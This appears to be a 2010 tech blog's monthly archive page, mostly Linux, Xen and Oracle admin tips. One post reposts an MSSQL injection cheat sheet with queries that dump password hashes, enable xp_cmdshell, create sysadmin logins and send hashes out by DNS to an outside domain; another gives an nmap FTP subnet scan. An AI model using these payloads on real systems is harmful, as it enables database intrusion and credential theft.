Monthly Archive for February, 2010

Bash Shell Keyboard shortcuts

Published on February 25, 2010 in Linux, Operating system and Tech. 1 Comment Tags: , , , .

The following shortcuts work when using default (Emacs) key bindings. Vi-bindings can be enabled by running set -o vi.

Tab ⇆ : Autocompletes from the cursor position.
Ctrl+a : moves the cursor at the beginning of the line (equivalent to the key Home).
Ctrl+e : (end) moves the cursor at the line end (equivalent to the key End).
Ctrl+p : (previous) recalls the previous command (equivalent to the key ).
Ctrl+n : (next) recalls the next command (equivalent to the key ).
Ctrl+r : (research) recalls the last command including the specified character(s). A second Ctrl+r recalls the next anterior command which corresponds to the research
Ctrl+s : Go back to the next more recent command of the research (beware to not execute it from a terminal because this command also launches its XOFF). If you changed that XOFF setting, use Ctrl+q to return.
Ctrl+o : executes the found command from research.
Ctrl+l : clears the screen content (equivalent to the command clear).
Ctrl+u : clears the line content before the cursor and copy it in the clipboard.
Ctrl+k : clears the line content after the cursor and copy it in the clipboard.
Ctrl+w : clears the word before the cursor and copy it in the clipboard.
Ctrl+y : (yank) adds the clipboard content from the cursor position.
Ctrl+d : sends an EOF marker, which (unless disabled by an option) closes the current shell (equivalent to the command exit).
Ctrl+c : sends the signal SIGINT to the current task, which aborts and closes it.
Ctrl+z : sends the signal SIGTSTP to the current task, which suspends it. To return to it later one can enter fg ‘process name’ (foreground).
Ctrl+x Ctrl+x : (because x has a crossing shape) alternates the cursor with its old position.
Ctrl+x Ctrl+e : (editor because it takes the $EDITOR shell variable) edits the current line in vi.
Alt+f : (forward) moves forward the cursor of one word.
Alt+b : (backward) moves backward the cursor of one word.
Alt+Del : cuts the word before the cursor.
Alt+d : cuts the word after the cursor.
Alt+u : capitalizes every character from the cursor’s position to the end of the current word.
Alt+l : lowers the case of every character from the cursor’s position to the end of the current word.
Alt+c : capitalizes the character under the cursor and moves to the end of the word.
Alt+r : cancels the changes and put back the line as it was in the history.

不停地安装Oracle

Published on February 24, 2010 in Tech. 0 Comments Tags: .

今天在Xen上运行了两个2GB内存实例的CentOS5.3虚拟机安装oracle10g, 可是一直出现

Configuration assistant “Oracle Net Configuration Assistant” failed

1
 ./runInstaller -silent -ignoreSysPrereqs -responseFile   /home/oracle/database/install/response/ee.rsp

我想这是因为网络问题引起监听没有启动,所以,安装完成后直接运行

1
/opt/oracle/product/10.2.01/db_1/cfgtoollogs/configToolAllCommands

接着在另外一个终端启动监听

1
lsnrctl start

由于是动态监听.所以要大概30秒之后启动成功,注意是要在 PMON 服务进程启动成功之后才能运行 lsnrctl start. 也就是说要在 /opt/oracle/product/10.2.01/db_1/cfgtoollogs/configToolAllCommands 脚本建立数据库完成,创建实例并成功启动之后,也就是大概脚本运行到80%左右的时候.最后启动 em Web管理.

1
 emctl start dbconsole

EM启动有问题(我就遇到1158的java进程一直defunct状态,但是emangent却起来了),重新建立EM资料库,重新启动服务器.

1
 emca -config dbcontrol db -repos recreate

(*)update

后来发现是因为缺少 libXp.so.6 而不能启动的(我想oracle应该有trace的工具,但是我现在还不知道怎么用,就想gdb或者strace一样?),于是在CentOS5.3上安装了 libXp 的RPM问题解决.

Xen3.0中文手册

Published on February 24, 2010 in Tech. 0 Comments Tags: .

http://fred.oracle1.com/~fred/Xen3man/

Logging In to Xen Console After Receiving “xenconsole: Could not open tty” Error

Published on February 24, 2010 in Tech. 0 Comments Tags: , , .

So you try and log in to a domU and xen says it can’t open a tty?

1
2
3
4
5
6
[tres@calliope ~]$ sudo xm console xen-domu.vm
xenconsole: Could not open tty `/dev/pts/15': No such file or directory
This error normally happens when xenconsoled is no longer running. You can quickly verify by looking for the xenconsoled process:

[tres@calliope ~]$ ps auxwww | grep xenconsoled
[tres@calliope ~]$

If you don’t find it, just run

1
/etc/init.d/xend start

Key-Value 系統 分類整理 (NoSQL)

Published on February 23, 2010 in Free Soft and database. 0 Comments Tags: , .

一般使用的 DB 統稱是 RDBMS(MSSQL、MySQL … 等), 現在因為雲端運算的興起, Key-Value 的系統也漸漸紅了起來, 那到底有哪些 Key-Value system 可以用呢?

此篇文章 A Yes for a NoSQL Taxonomy 主要是這篇 NoSQL is a Horseless Carriage 簡報的整理.

此簡報將 Key-Value 的系統分成幾個類別, 並將這些資料整理出來. (下述內容主要取自簡報, 另外補上 連結 和 簡介.)

註: 下述連結有可能有誤, 有些系統不熟, 若有錯誤麻煩請隨時糾正我. orz. Continue reading ‘Key-Value 系統 分類整理 (NoSQL)’

最完整Html符号大全

Published on February 23, 2010 in Tech. 0 Comments Tags: .

Html符号大全

MSSQL Injection Cheat Sheet

Published on February 9, 2010 in crack and database. 2 Comments Tags: , , , , .
Version SELECT @@version
Comments SELECT 1 — comment
SELECT /*comment*/1
Current User SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users SELECT name FROM master..syslogins
List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005
List Privileges Impossible?
List DBA Accounts TODO
SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try ‘bulkadmin’, ‘systemadmin’ and other values from thedocumentation
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
Current Database SELECT DB_NAME()
List Databases SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
List Columns SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
List Tables SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
Find Tables From Column Name – NB: This example works only for the current database.  If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
Select Nth Row SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row
Select Nth Char SELECT substring(‘abcd’, 3, 1) — returns c
Bitwise AND SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0
ASCII Value -> Char SELECT char(0×41) — returns A
Char -> ASCII Value SELECT ascii(‘A’) – returns 65
Casting SELECT CAST(’1′ as int);
SELECT CAST(1 as char)
String Concatenation SELECT ‘A’ + ‘B’ – returns AB
If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1
Case Statement SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1
Avoiding Quotes SELECT char(65)+char(66) — returns AB
Time Delay WAITFOR DELAY ’0:0:5′ — pause for 5 seconds
Make DNS Requests declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\\’ + @host + ‘\c$\boot.ini”’); — nonpriv, works on 2000

declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ + @host + ‘\c$\boot.ini”’); — priv, works on 2005

– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
– Also check out theDNS tunnel feature of sqlninja
Command Execution EXEC xp_cmdshell ‘net user’; — priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
RECONFIGURE; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv
RECONFIGURE; — priv
Local File Access CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:\boot.ini’;
DROP TABLE mydata;
Hostname, IP Address SELECT HOST_NAME()
Create Users EXEC sp_addlogin ‘user’, ‘pass’; — priv
Drop Users EXEC sp_droplogin ‘user’; — priv
Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv
Location of DB files TODO

Use nmap scan FTP server how to

Published on February 9, 2010 in Operating system. 0 Comments Tags: , , , , .
1
nmap -p T:21 -T4 -A -n 172.16.95.0-255

How to keep alive with ssh server

Published on February 7, 2010 in Linux. 0 Comments Tags: .
1
ssh -o TCPKeepAlive fred@oracle1.com

or add follw to your $HOME/.ssh/config file

1
ServerAliveInterval 60

Download file use bash script and wget

Published on February 5, 2010 in Linux. 0 Comments Tags: .
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/bin/sh
DOWN_DIR=/home/fred/example.com/upload/
while read line
#c=1
do
#c=`expr $c + 1`
#echo -e "$line \n"
file1=`echo -e $line| awk -F" " '{ print $1 }'`
file2=`echo -e $line| awk -F" " '{ print $2 }'`
dir1=$DOWN_DIR`echo $file2| awk -F"/" '{ print $1"/"$2 }'`
mkdir -p $dir1
wget $file1 -O $DOWN_DIR${file2}.jpg
#if [ $c -lt 3 ];then
#exit
#fi
done < "/home/fred/src/db.txt"